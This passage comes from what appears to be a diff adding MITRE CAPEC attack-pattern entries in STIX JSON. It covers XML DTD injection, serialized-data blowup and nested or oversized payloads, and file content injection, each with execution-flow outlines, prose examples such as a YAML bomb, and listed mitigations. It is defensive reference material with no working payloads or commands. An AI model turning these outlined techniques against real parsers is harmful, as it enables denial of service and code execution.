    2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

  2. Determine use of XML with DTDs: Examine application input to identify XML input that leverage the use of one or more DTDs.

    3. Techniques
    Examine any available documentation for the application that discusses expected XML input.
    Exercise the application using XML input with and without a DTD specified. Failure without DTD likely indicates use of DTD.

Exploit

  1. [Craft and inject XML containg malicious DTD payload]

    2. Techniques
    Inject XML expansion attack that creates a Denial of Service impact on the targeted server using its DTD.
    Inject XML External Entity (XEE) attack that can cause the disclosure of confidential information, execute abitrary code, create a Denial of Service of the targeted server, or several other malicious impacts.
", + "x_capec_prerequisites": [ + "The target must be running an XML based application that leverages DTDs." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", + "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa5c2311-5b43-4e21-9d1c-a3f38ff378bc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--683d38cf-120d-459e-b68f-e88ec1e6e9ea", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use XML parsing tools that protect against DTD attacks.", + "id": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--696727ca-cfe5-4525-84d1-4285f4a40004", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. The weakness being exploited is tied to parser implementation and not language specific.", + "external_references": [ + { + "external_id": "CAPEC-229", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/229.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "XML Attribute Blowup", + "external_id": "41", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Attribute-Blowup" + } + ], + "id": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data Parameter Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).\n \n A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.\n ", + "\n A YAML bomb leverages references within a YAML file to create exponential growth in memory requirements. By creating a chain of keys whose values are a list of multiple references to the next key in the chain, the amount of memory and processing required to handle the data grows exponentially. This may lead to denial of service or instability resulting from excessive resource consumption.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process requests using serialized data.

    2. Techniques
    Use an automated tool to record all instances of URLs to process requests from serialized data.
    Use a browser to manually explore the website and analyze how the application processes requests using serialized data.

Exploit

  1. Launch a Blowup attack: The attacker crafts malicious messages that contain multiple configuration parameters in the same dataset.

    2. Techniques
    Send the malicious crafted message containing the multiple configuration parameters to the target URL, causing a denial of service.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The server accepts input in the form of serialized data and is using a parser with a runtime longer than O(n) for the insertion of a new configuration parameter in the data container.(examples are .NET framework 1.0 and 1.1)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated completely by using a parser that is not using a vulnerable container.", + "id": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigation may limit the number of configuration parameters per dataset.", + "id": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4b0778c-9df8-4c69-a647-540ef4e5f2aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary poisons files with a malicious payload (targeting the file systems accessible by the target software), which may be passed through by standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes, in order to exploit the host's trust in executing remote content, including binary files.", + "external_references": [ + { + "external_id": "CAPEC-23", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "modified": "2022-02-22T00:00:00.000Z", + "name": "File Content Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.\n " + ], + "x_capec_extended_description": "\n Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary's program can access relative directories such as C:\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c" + ], + "x_capec_prerequisites": [ + "The target software must consume files.", + "The adversary must have access to modify files that the target software will consume." + ], + "x_capec_skills_required": { + "Medium": "How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e333960-e5cb-4589-9771-ba6ba993cd18", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)", + "id": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc7b7a16-616e-46d7-b94c-09b98235f8a0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b7de6045-8f58-4418-9b3f-fc61acce3199", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Virus scanning on host", + "id": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a05f53a8-d3f4-43a9-918b-d1d51c74287e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--960af13f-fe8f-4f17-982b-7e5360329636", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.", + "external_references": [ + { + "external_id": "CAPEC-230", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/230.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Serialized Data with Nested Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by a data parser that supports using substitution on the victim's side.

Exploit

  1. An adversary crafts input data that may have an adverse effect on the operation of the parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n An adversary's goal is to leverage parser failure to their advantage. In most cases this type of an attack will result in a Denial of Service due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].\n This attack is most closely associated with web services using SOAP or a Rest API, because remote service requesters can post malicious payloads to the service provider. The main weakness is that the service provider generally must inspect, parse, and validate the messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that this attack targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_prerequisites": [ + "An application's user-controllable data is expressed in a language that supports subsitution.", + "An application does not perform sufficient validation to ensure that user-controllable data is not malicious." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable data prior to passing it to the data parser routine. Ensure that the resultant data is safe to pass to the data parser.", + "id": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e30d321-aee2-4f0d-942b-aab56874c9cd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on canonical data.", + "id": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8c47b649-733d-47c3-a553-9ef173fdeb95", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the data parser.", + "id": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14e9f6cc-aaff-41a7-b258-5c540335632f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-231", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/231.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Oversized Serialized Data Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861" + ], + "x_capec_prerequisites": [ + "An application uses an parser for serialized data to perform transformation on user-controllable data.", + "An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser." + ], + "x_capec_skills_required": { + "High": "Arbitrary code execution", + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable serialized data prior to passing it to the parser routine. Ensure that the resultant data is safe to pass to the parser.", + "id": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abe2962c-e934-432f-9b1b-de3b76706fbc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7f9b18e-bc2b-4981-ac34-7d93f9d6dde7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the serialized data parser.", + "id": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2938365a-8b0f-4d54-8471-81ea79d3ef9a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate data against a valid schema or DTD prior to parsing.", + "id": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-3", + "object_marking_refs": [ + 